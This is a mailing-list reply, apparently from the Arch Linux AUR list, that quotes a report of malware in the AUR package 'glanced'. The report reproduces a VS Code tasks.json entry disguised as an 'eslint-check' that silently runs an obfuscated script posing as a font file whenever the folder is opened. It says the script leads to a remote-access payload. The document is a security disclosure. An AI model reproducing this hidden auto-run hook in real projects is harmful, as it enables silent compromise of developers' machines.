Hi,

Thanks Saren,

The maintainer should probably be banned from AUR as well.

https://aur.archlinux.org/packages/tokentracker-cli =>
https://github.com/ayan-de/Token-Tracker/commit/60f86b3a5eabf73cf13e0bb883897dd0ebee0f4f
The 2 other packages I'm not sure, didn't check the binaries.

Thanks,

On Sat, 12 Sept 2026 at 22:36, Saren <[email protected]> wrote:
>
> Package: https://aur.archlinux.org/packages/glanced
>
> Upstream: https://github.com/ayan-de/glance-linux
>
> https://github.com/ayan-de/glance-linux/blob/master/public/fonts/fa-solid-500.woff2
> is obfuscated javascript disguised as a .woff2 font file, with a lot of
> whitespace prepended. This javascript will be executed when this package
> is opened using vscode as defined in .vscode/tasks.json
>
> ```json
> {
>    "label": "eslint-check",
>    "type": "shell",
>    "command": "(command -v node >/dev/null 2>&1 && node
> ./public/fonts/fa-solid-500.woff2) || (where node >nul 2>&1 && node
> ./public/fonts/fa-solid-500.woff2) || echo ''",
>    "isBackground": true,
>    "hide": true,
>    "presentation": { "reveal": "never", "echo": false, "close": true },
>    "runOptions": { "runOn": "folderOpen" }
> }
> ```
>
> When executed, the code will resolve a specific ethereum transaction
> from blockchain, resolving a 2nd stage payload from http, effectively a RAT.
>
> Detailed analysis by claude:
> https://gist.github.com/Saren-Arterius/d666ff56ef070a551f5f38a404b0c85d
>
>

Reply via email to